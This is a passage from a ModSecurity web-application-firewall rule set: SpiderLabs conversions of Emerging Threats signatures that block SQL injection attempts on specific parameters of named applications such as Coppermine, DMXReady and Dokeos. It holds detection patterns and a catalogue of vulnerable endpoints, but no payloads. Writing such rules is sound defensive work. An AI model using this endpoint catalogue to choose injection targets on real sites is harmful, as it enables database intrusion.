ContentNow SQL Injection Attempt -- index.php pageid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2822'" SecRule &TX:'/SQL_INJECTION.*ARGS:pageid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ContentNow SQL Injection Attempt -- index.php pageid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006308) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Contra Haber Sistemi SQL Injection Attempt -- haber.asp id UPDATE SecRule REQUEST_LINE "@contains /haber.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006308,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Contra Haber Sistemi SQL Injection Attempt -- haber.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21626'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Contra Haber Sistemi SQL Injection Attempt -- haber.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004815) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE SecRule REQUEST_LINE "@contains /thumbnails.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004815,rev:7,msg:'SLR: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3371'" SecRule &TX:'/SQL_INJECTION.*ARGS:cpg131_fav/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Coppermine Photo Gallery (CPG) SQL Injection Attempt -- thumbnails.php cpg131_fav UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005846) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat UPDATE SecRule REQUEST_LINE "@contains /albmgr.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005846,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21894'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- albmgr.php cat UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005852) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- usermgr.php gid UPDATE SecRule REQUEST_LINE "@contains /usermgr.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005852,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- usermgr.php gid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21894'" SecRule &TX:'/SQL_INJECTION.*ARGS:gid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- usermgr.php gid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005858) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- db_ecard.php start UPDATE SecRule REQUEST_LINE "@contains /db_ecard.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005858,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- db_ecard.php start UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21894'" SecRule &TX:'/SQL_INJECTION.*ARGS:start/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Coppermine Photo Gallery SQL Injection Attempt -- db_ecard.php start UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003757) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CreaScripts CreaDirectory SQL Injection Attempt -- error.asp id UPDATE SecRule REQUEST_LINE "@contains /error.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003757,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CreaScripts CreaDirectory SQL Injection Attempt -- error.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3767'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CreaScripts CreaDirectory SQL Injection Attempt -- error.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005864) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CreateAuction SQL Injection Attempt -- cats.asp catid UPDATE SecRule REQUEST_LINE "@contains /cats.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005864,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS CreateAuction SQL Injection Attempt -- cats.asp catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21929'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CreateAuction SQL Injection Attempt -- cats.asp catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004040) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php UPDATE SecRule REQUEST_LINE "@contains /cart.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004040,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/469301/100/0/threaded'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS CubeCart SQL Injection Attempt -- cart.inc.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010275) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DEDECMS feedback_js.php arcurl Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /plus/feedback_js.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010275,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS DEDECMS feedback_js.php arcurl Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.packetstormsecurity.org/0910-exploits/dedecms-sql.txt'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:arcurl/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DEDECMS feedback_js.php arcurl Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004088) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php catid UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004088,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php catid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24201'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004461) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php newsid UPDATE SecRule REQUEST_LINE "@contains /news.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004461,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php newsid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24212'" SecRule &TX:'/SQL_INJECTION.*ARGS:newsid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DGNews SQL Injection Attempt -- news.php newsid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004688) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Site Engine Manager SQL Injection Attempt -- index.asp mid UPDATE SecRule REQUEST_LINE "@contains /index.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004688,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Site Engine Manager SQL Injection Attempt -- index.asp mid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21064'" SecRule &TX:'/SQL_INJECTION.*ARGS:mid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Site Engine Manager SQL Injection Attempt -- index.asp mid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006086) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- set_preferences.asp UPDATE SecRule REQUEST_LINE "@contains /set_preferences.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006086,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- set_preferences.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- set_preferences.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006092) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- send_password_preferences.asp UPDATE SecRule REQUEST_LINE "@contains /send_password_preferences.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006092,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- send_password_preferences.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- send_password_preferences.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006098) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- list.asp UPDATE SecRule REQUEST_LINE "@contains /SecureLoginManager/list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006098,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- list.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- list.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006104) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- login.asp sent UPDATE SecRule REQUEST_LINE "@contains /login.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006104,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- login.asp sent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule &TX:'/SQL_INJECTION.*ARGS:sent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- login.asp sent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006110) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- content.asp sent UPDATE SecRule REQUEST_LINE "@contains /content.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006110,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- content.asp sent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule &TX:'/SQL_INJECTION.*ARGS:sent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- content.asp sent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006116) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- members.asp sent UPDATE SecRule REQUEST_LINE "@contains /members.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006116,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- members.asp sent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule &TX:'/SQL_INJECTION.*ARGS:sent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- members.asp sent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006122) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- inc_secureloginmanager.asp sent UPDATE SecRule REQUEST_LINE "@contains /applications/SecureLoginManager/inc_secureloginmanager.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006122,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- inc_secureloginmanager.asp sent UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21788'" SecRule &TX:'/SQL_INJECTION.*ARGS:sent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DMXReady Secure Login Manager SQL Injection Attempt -- inc_secureloginmanager.asp sent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005900) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digitizing Quote And Ordering System SQL Injection Attempt -- search.asp ordernum UPDATE SecRule REQUEST_LINE "@contains /search.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005900,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Digitizing Quote And Ordering System SQL Injection Attempt -- search.asp ordernum UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3089'" SecRule &TX:'/SQL_INJECTION.*ARGS:ordernum/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digitizing Quote And Ordering System SQL Injection Attempt -- search.asp ordernum UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004839) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Design4Online UserPages2 SQL Injection Attempt -- page.asp art_id UPDATE SecRule REQUEST_LINE "@contains /page.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004839,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Design4Online UserPages2 SQL Injection Attempt -- page.asp art_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22636'" SecRule &TX:'/SQL_INJECTION.*ARGS:art_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Design4Online UserPages2 SQL Injection Attempt -- page.asp art_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005596) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digiappz DigiAffiliate SQL Injection Attempt -- visu_user.asp id UPDATE SecRule REQUEST_LINE "@contains /visu_user.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005596,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Digiappz DigiAffiliate SQL Injection Attempt -- visu_user.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3122'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digiappz DigiAffiliate SQL Injection Attempt -- visu_user.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005840) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Digirez SQL Injection Attempt -- info_book.asp book_id UPDATE SecRule REQUEST_LINE "@contains /info_book.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005840,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Digirez SQL Injection Attempt -- info_book.asp book_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3081'" SecRule &TX:'/SQL_INJECTION.*ARGS:book_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Digirez SQL Injection Attempt -- info_book.asp book_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010073) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010073,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/507072'" SecRule REQUEST_LINE "@contains /docebo/docebo" "chain" SecRule REQUEST_LINE "@contains UPDATE" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:modname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2010078) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010078,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/507072'" SecRule REQUEST_LINE "@contains /docebo/docebo" "chain" SecRule REQUEST_LINE "@contains UPDATE" "chain" SecRule REQUEST_LINE "@contains SET" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:modname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Docebo UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004052) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- courseLog.php scormcontopen UPDATE SecRule REQUEST_LINE "@contains /tracking/courseLog.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004052,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- courseLog.php scormcontopen UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3980'" SecRule &TX:'/SQL_INJECTION.*ARGS:scormcontopen/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- courseLog.php scormcontopen UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004070) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- my_progress.php course UPDATE SecRule REQUEST_LINE "@contains /main/auth/my_progress.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004070,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- my_progress.php course UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3974'" SecRule &TX:'/SQL_INJECTION.*ARGS:course/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dokeos SQL Injection Attempt -- my_progress.php course UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006146) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Dragon Business Directory SQL Injection Attempt -- bus_details.asp ID UPDATE SecRule REQUEST_LINE "@contains /bus_details.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006146,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Dragon Business Directory SQL Injection Attempt -- bus_details.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2992'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Dragon Business Directory SQL Injection Attempt -- bus_details.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004390) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS fystyq Duyuru Scripti SQL Injection Attempt -- goster.asp id UPDATE SecRule REQUEST_LINE "@contains /goster.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004390,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS fystyq Duyuru Scripti SQL Injection Attempt -- goster.asp id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22910'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS fystyq Duyuru Scripti SQL Injection Attempt -- goster.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006692) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp iFile UPDATE SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006692,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp iFile UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21405'" SecRule &TX:'/SQL_INJECTION.*ARGS:iFile/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp iFile UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006699) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DUware DUdownload SQL Injection Attempt -- detail.asp action UPDATE SecRule REQUEST_LINE "@contains /detail.asp" 